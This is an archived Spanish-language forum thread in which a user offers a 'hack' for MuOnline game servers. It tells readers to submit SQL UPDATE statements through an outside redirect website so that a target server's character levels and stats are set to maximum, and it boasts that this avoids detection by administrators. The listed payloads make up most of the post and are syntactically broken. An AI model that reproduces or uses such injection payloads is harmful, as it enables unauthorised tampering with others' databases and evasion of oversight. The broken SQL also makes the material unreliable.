Hack MuOnline SqlInjection--

Tema en 'Temas Archivados' iniciado por lamikey, 2 Feb 2011.

Estado del tema:
Cerrado para nuevas respuestas
  1. lam

    lamikey
    Expand Collapse
    Recluta

    Mensajes:
    6
    Me Gusta recibidos:
    0
    buenas aka les traigo un metodo de sql injection rdc (redireccion)
    se trata de una web externa donde se hacen consultas sql
    es como un test de vulnerabilidad online,
    Pero nosotros la vamos a usar para otra cosa..
    la ventaja que tenemos es que esta web, trabaja
    bajo la encriptacion de codigo(en este caso las consultas sql)
    entonces no corremos el riesgo de ser detectados por un administrador...

    bueno lo primero es entrar en esta web: http://sqlinjection.redirectme.net/index.php
    lo segundo sera realizar la consulta sql de esta forma:


    Level:
    @'UPDATE Character Set cLevel = '400' WHERE (Name = 'usser' Password = 'pass' Host = 'www.web.com')--

    Resets:
    @'UPDATE Character Set Reset = '50' WHERE (Name = 'usser' Password = 'pass' Host = 'www.web.com')--

    Fuerza:
    @'UPDATE Character Set Strength = '32000' WHERE (Name = 'usser' Password = 'pass')--

    Agilidad:
    @'UPDATE Character Set Dexterity = '32000' WHERE (Name = 'usser' Password = 'pass' Host = 'www.web.com')--

    Vitalidad:
    @'UPDATE Character Set Vitality = '32000' WHERE (Name = 'usser' Password = 'pass' Host = 'www.web.com')--

    Energia:
    @'UPDATE Character Set Energy = '32000' WHERE (Name = 'usser' Password = 'pass' Host = 'www.web.com')--

    Command:
    @'UPDATE Character Set Command = '32000' WHERE (Name = 'usser' Password = 'pass' Host = 'www.web.com')--

    luego le damos click en Query y esperamos que termine...

    esta web hace tiempo que se usa para esto, y debido a los abusos, blokearon muchas cosas...
    bueno gente espero les guste y no abusen por que la van a cerrar...
     
  2. lam

    lamikey
    Expand Collapse
    Recluta

    Mensajes:
    6
    Me Gusta recibidos:
    0
    disculpen me falto el " Host = 'www.web.com')--"
     
Estado del tema:
Cerrado para nuevas respuestas

Compartir esta página